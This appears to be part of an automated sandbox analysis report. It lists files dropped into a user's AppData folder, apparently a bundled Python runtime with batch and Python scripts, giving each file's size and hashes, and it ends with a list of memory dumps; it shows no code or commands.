07632cbf10795287e656ea7d7816ecd0682e39f736402c2da66e55735fb03ff83548c40c2c71717a8676201fb57f1a2faef144fc1170137a9652fc5d181a92f9

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\ctypes\__pycache__\_endian.cpython-312.pyc

Filesize
3KB

MD5
6dc384160e70f0d0e4264f8fe2a406a0

SHA1
2bfaf556aa8d8bea60f59ce315b2d45dfa73a437

SHA256
9ba88ed042f44f75470690e8a73bcbadea28581176de593981f33121ef7d854b

SHA512
ead2992cb2c9f590ca265dafabbbde07bce53f527327e150df36b28c7635b109554fc46246802bf36383ac9d1594b95eaef5b0fb00fc6c25b137684bb0e95b6b

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\ctypes\_endian.py

Filesize
2KB

MD5
7daa213263c75057cf125267b7fdfbd3

SHA1
efb9403d8e3f09734f6b2ba3889b274997d0a039

SHA256
8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579

SHA512
1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\__init__.py

Filesize
5KB

MD5
ea0e0d20c2c06613fd5a23df78109cba

SHA1
b0cb1bedacdb494271ac726caf521ad1c3709257

SHA256
8b997e9f7beef09de01c34ac34191866d3ab25e17164e08f411940b070bc3e74

SHA512
d8824b315aa1eb44337ff8c3da274e07f76b827af2a5ac0e84d108f7a4961d0c5a649f2d7d8725e02cd6a064d6069be84c838fb92e8951784d6e891ef54737a3

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\__pycache__\__init__.cpython-312.pyc

Filesize
5KB

MD5
c6e7a320bcd3cfd93eeaad2ded5441df

SHA1
cb3042a4b3b2cd86a96f4b575b09e03dad602855

SHA256
d153f7cda31b3d8c18391a725fe09b4101c7db519962ff43f6a7cdf35bee2e75

SHA512
5fac090e3958a4a80c7cc46272e71db13fb5dfc924c5fc7b6ca657754b763e60c66b31636522aa4c11a3f2a8cb2cbcb2a12375b5406fd1ae14138ad58fcf34e3

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\__pycache__\aliases.cpython-312.pyc

Filesize
12KB

MD5
7372093b1cbc7046b9c6ac739f9d6663

SHA1
64ecc1edae4722f1d14427ca35191ca0e0dbb7d3

SHA256
74ed63ebdfc392a7e54a91af451d65617bd3f02ffb72eb54515840bdb5786fe9

SHA512
a54e14044e304d15f26d8f33531a2ee54dec461e8dbd797a6039477f111e6bae9a628bcd7c89c668171ec59bdac0564a1d4c5481def1a2fc2ca929897d1b0f0d

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\__pycache__\cp1252.cpython-312.pyc

Filesize
3KB

MD5
c6645129efc049ee6d1ad50c09224e68

SHA1
20228bcc34d8812c4ce05af8602c40cadd33eb24

SHA256
b5f99cec3e8c2df4bba976bd7e5bdf5ceb075ec8f6d1d9b127f71ed98a50a124

SHA512
68d1f06b40ca015090f76be95b9035b7b461f106800cbc1cc36aefb2e4136fa1d43a7566798dbc29da964ae18f6a2d73b249941207c627ec2d3434e7e973636d

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\__pycache__\utf_8.cpython-312.pyc

Filesize
2KB

MD5
920fce43b709a089699c17fc429764ce

SHA1
369bcfb71f06e1e3c8a9663350318604084307ec

SHA256
b9dd2d8680f26d1badf5bfd204923e6574f113c1f93c9a247362698cbafea79b

SHA512
150f5e8a61fd4c129c4926e9d2f3b1855424983fdc35919995b72d4366b799f042bb9bb2390ceb9aaf807400ab48b2a3cbac2fe01387b839974f4debf48c452b

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\aliases.py

Filesize
15KB

MD5
ff23f6bb45e7b769787b0619b27bc245

SHA1
60172e8c464711cf890bc8a4feccff35aa3de17a

SHA256
1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8

SHA512
ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\cp1252.py

Filesize
13KB

MD5
52084150c6d8fc16c8956388cdbe0868

SHA1
368f060285ea704a9dc552f2fc88f7338e8017f2

SHA256
7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519

SHA512
77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\encodings\utf_8.py

Filesize
1KB

MD5
f932d95afcaea5fdc12e72d25565f948

SHA1
2685d94ba1536b7870b7172c06fe72cf749b4d29

SHA256
9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e

SHA512
a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\enum.py

Filesize
81KB

MD5
3a87f9629edad420beb85ab0a1c4482a

SHA1
30c4c3e70e45128c2c83c290e9e5f63bcfa18961

SHA256
9d1b2f7dd26000e03c483bc381c1af20395a3ac25c5fd988fbed742cd5278c9a

SHA512
e0aed24d8a0513e8d974a398f3ff692d105a92153c02d4d6b7d3c8435dedbb9482dc093eb9093fb86b021a28859ab541f444e8acc466d8422031d11040cd692a

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\functools.py

Filesize
38KB

MD5
3638d2608c42e3a3bf3b2b1c51b765f4

SHA1
be947a9b8301bbedf2406416ac908963279b46cd

SHA256
bd6f192c31c5e266ad9eec9f550b8bc485f90d583764ff81aa3f36d1209f005e

SHA512
14b60f0b5119b90fcd4db3b0aeb48ec4ca9775910470178796ba54c0d16f8887b9a3d283f925af779a1cc6bc99d25f016cccbf2bb72d4a9099bb821a54a2b418

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\keyword.py

Filesize
1KB

MD5
a10df1136c08a480ef1d2b39a1f48e4a

SHA1
fc32a1ff5da1db4755ecfae82aa23def659beb13

SHA256
1f28f509383273238ad86eda04a96343fa0dc10eeaf3189439959d75cdac0a0b

SHA512
603f6dc4556cbbd283cf77233727e269c73c6e1b528084e6c6234aefd538313b4acc67ca70a7db03e015a30f817fcfedda2b73de480963ae0eefd486f87463cd

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\operator.py

Filesize
11KB

MD5
dc7484406cad1bf2dc4670f25a22e5b4

SHA1
189cd94b6fdca83aa16d24787af1083488f83db2

SHA256
c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c

SHA512
ac55baced6c9eb24bc5ecbc9eff766688b67550e46645df176f6c8a6f3f319476a59ab6fc8357833863895a4ef7f3f99a8dfe0c928e382580dfff0c28ca0d808

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\re\__init__.py

Filesize
16KB

MD5
02f3e3eb14f899eb53a5955e370c839f

SHA1
e5c3ab0720b80a201f86500ccdc61811ab34c741

SHA256
778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42

SHA512
839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\re\__pycache__\__init__.cpython-312.pyc

Filesize
17KB

MD5
a714746eadf33d9bba655601e925de5e

SHA1
9db572b9b053da46244c927b8e8e1d7a428e6ea4

SHA256
0f61ca656560a20faf8ce8072cd85ffa4106255dd2d5b715be91b12f941dcdb8

SHA512
651dd990ec9d5a0bdf30b99add1775bed8cd5d5f00dc14d818d7f6d9364233b866e984af8f018ddc4a08ce1779232430f839b2e1d470988a68d5e7828fb98d1d

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\struct.py

Filesize
272B

MD5
5b6fab07ba094054e76c7926315c12db

SHA1
74c5b714160559e571a11ea74feb520b38231bc9

SHA256
eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945

SHA512
2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

Download Submit
C:\Users\Admin\AppData\Local\window\window\Lib\types.py

Filesize
11KB

MD5
8303d9715c8089a5633f874f714643a7

SHA1
cdb53427ca74d3682a666b83f883b832b2c9c9f4

SHA256
d7ce485ecd8d4d1531d8f710e538b4d1a49378afacb6ff9231e48c645a9fa95e

SHA512
1a6ca272dde77bc4d133244047fcc821ffcb3adee89d400fe99ece9cf18ab566732d48df2f18f542b228b73b3402a3cace3cd91a9e2b9480b51f7e5e598d3615

Download Submit
C:\Users\Admin\AppData\Local\window\window\Scripts\pip3.12.exe

Filesize
105KB

MD5
5b1c24e5b9fc66d5b9108a0597057d29

SHA1
4ae03475c75a9c8f011e1f797316aceabeeeacc7

SHA256
703b96d00ad4864ac2a854e49d725cac996dfc7e8c16e4b8f2c2891965c9a2ae

SHA512
fe158a3be5a84ddb7a715a155f78bbf4492b05991a1ba19aa9e1a7e068415f15555ab24c3ddf3537fcdfc4aa9a283924a2161f8176f36ffbbb1611f8e4b897c1

Download Submit
C:\Users\Admin\AppData\Local\window\window\b.bat

Filesize
224B

MD5
f750dca90f47609fc2d874c60a82e056

SHA1
250672e6a6310f45f4012b29210d65ef7d17ab8c

SHA256
e00e0b7940accfe9e16a3ead5a15d2f276033295408d950b9dd45689d05f62ac

SHA512
18fe3b0e427cfa92aafb8f5531504e711896d13e4cbdf03d24e785dfdad4f204e910eaf0d3225d0b8ba789a2ddd5d63e58a2b7e011ab2ffcfc14a2ba732bb928

Download Submit
C:\Users\Admin\AppData\Local\window\window\ma.py

Filesize
446KB

MD5
71faba4b77f6af8ee72146790f247d2a

SHA1
f085cc99dc537fc29ee8deefc67b4aa202378a01

SHA256
348795404034488c3ff8cce761ce69bf870556b779b8dc469a0f9312faf6dcca

SHA512
3401f3ccc5fe4edd80be4d7d4674470060018dce490d34c72d0527db067e10f39d42754cafa81143033c088880ed931cb9778887c36e0953ea63d8207a5e663f

Download Submit
C:\Users\Admin\AppData\Local\window\window\python.exe

Filesize
100KB

MD5
3d44212bba2d7a88d6c83ce8523bba88

SHA1
62ea5374c17b0f2f88f7d4a6c03b592393dba6f8

SHA256
15b41a488c356c0e331facdea6c836a6cec021f12d5fde9844e7ca4a1aa0361a

SHA512
89297f1fbe811b23a38fc3dbc22989dfb9faf97960c65f1f0f43be710204b32f41f33ef0bb893815db71c4462d04b52f686b40801f6d4cbd8e529d740618ac67

Download Submit
C:\Users\Admin\AppData\Local\window\window\python3.dll

Filesize
66KB

MD5
79b02450d6ca4852165036c8d4eaed1f

SHA1
ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4

SHA256
d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123

SHA512
47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

Download Submit
C:\Users\Admin\AppData\Local\window\window\python312.dll

Filesize
6.6MB

MD5
3c388ce47c0d9117d2a50b3fa5ac981d

SHA1
038484ff7460d03d1d36c23f0de4874cbaea2c48

SHA256
c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb

SHA512
e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Download Submit
C:\Users\Admin\AppData\Local\window\window\start.bat

Filesize
151B

MD5
b3694298171df40387068504d098df53

SHA1
cdc07938b9bd68d6e96b0f7f8d6f25c3d4d8951d

SHA256
d3f4d849e0958bac8f918aadf01f707e92a55f9d987c88e7605705829557568b

SHA512
de22bfb99f0aca309edc8fb61e5d5b11d2e7b7b56cf5f2376170d6522021435846a216506d0844bba4c01ddb2f5e06d68c79cf8db24c628f3d680a8e80a5fb90

Download Submit
C:\Users\Admin\AppData\Local\window\window\startup.bat

Filesize
703B

MD5
a61a4ce58fb908b66a0ce91500c03f70

SHA1
bc6d45667d24da7d49b522ee6f815ea603faf47a

SHA256
bc21e6786c2e25b7ba0a195df7c68fc49f81fd0b880145b9078051cace9210de

SHA512
aec75440a32eac43a3dadd882480bb00cb200ace41f220a12670a8e618a36336bbfa0e9417c0e14c0439fd33bd365c928266debc70c8e5b54c751ed6c238e1bb

Download Submit
C:\Users\Admin\AppData\Local\window\window\vcruntime140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
memory/1268-95-0x000001E69E7C0000-0x000001E69E7E2000-memory.dmp

Filesize
136KB

Download
memory/1860-275-0x000000000B2C0000-0x000000000B56B000-memory.dmp

Filesize
2.7MB

Download
memory/5196-290-0x00000233CCDF0000-0x00000233CCDFA000-memory.dmp

Filesize
40KB

Download
memory/5196-289-0x00000233E5030000-0x00000233E5042000-memory.dmp

Filesize
72KB

Download
memory/5680-5638-0x0000028E85380000-0x0000028E85391000-memory.dmp

Filesize
68KB

Download
memory/5680-5664-0x0000028E86F10000-0x0000028E86F20000-memory.dmp

Filesize
64KB

Download
memory/5844-5669-0x000001ABBC6F0000-0x000001ABBC6FF000-memory.dmp

Filesize
60KB

Download
memory/5844-5670-0x000001ABBE280000-0x000001ABBE28E000-memory.dmp

Filesize
56KB

Download